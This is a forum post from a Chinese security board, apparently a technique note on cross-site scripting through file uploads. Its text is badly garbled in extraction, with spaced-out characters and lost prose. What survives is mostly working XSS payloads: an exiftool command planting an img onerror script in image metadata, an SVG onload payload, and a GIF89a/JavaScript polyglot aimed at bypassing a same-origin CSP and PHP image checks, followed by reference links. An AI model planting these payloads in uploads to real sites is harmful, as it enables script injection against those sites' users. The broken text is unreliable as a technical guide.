搜索

[28850] 2021-04-11_文件上传XSS漏洞

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2021-04-11_文件上传XSS漏洞 X S S O t s   2 0 2 1 - 0 4 - 1 1 X S S X S S 1 使 X S S h a c k 2 l e a r n 线   W 3 S c h o o l s   X S S h t t p s : / / w w w . w 3 s c h o o l s . c o m / j s r e f / t r y i t . a s p ? f i l e n a m e = t r y j s r e f _ f i l e u p l o a d _ v a l u e 2 使 e x i f t o o l   E X I F $   e x i f t o o l   - F I E L D = X S S   F I L E E x a m p l e :
3 S V G 使 X S S P o C h t t p : / / b r u t e l o g i c . c o m . b r / p o c . s v g 线 4 G I F j a v a s c r i p t C S P   s c r i p t - s r c ' s e l f ' < s c r i p t >   a l e r t 1 < /   s c r i p t > $   e x i f t o o l   - A r t i s t =   > < i m g   s r c = 1   o n e r r o r = a l e r t ( d o c u m e n t . d o m a i n ) >   b r u t e . j p e g < s v g   x m l n s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / s v g "   o n l o a d = " a l e r t ( d o c u m e n t . d o m a i n ) " / >
. g i f G I F G I F 8 9 a J a v a S c r i p t X S S /   H T M L   M I M E U N I X P H P e x i f _ i m a g e t y p e g e t i m a g e s i z e G I F 使 G I F 8 9 a   /   *   < s v g   /   o n l o a d   =   a l e r t 1 >   *   /   =   a l e r t d o c u m e n t . d o m a i n / / ;
h t t p s : / / m e d i u m . c o m / @ l u c i d e u s / x s s - v i a - f i l e - u p l o a d - l u c i d e u s - r e s e a r c h - e e e 5 5 2 6 e c 5 e 2 h t t p s : / / b l o g . l u c i d e u s . c o m / 2 0 1 8 / 0 3 / x s s - v i a - f i l e - u p l o a d - l u c i d e u s - r e s e a r c h . h t m l h t t p s : / / s e c u r i t y o n l i n e . i n f o / f i l e - u p l o a d - x s s - v u l n e r a b i l i t i e s x s s - v i a - f i l e - u p l o a d / h t t p s : / / w w w . a c u n e t i x . c o m / v u l n e r a b i l i t i e s / w e b / f i l e - u p l o a d - x s s /
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理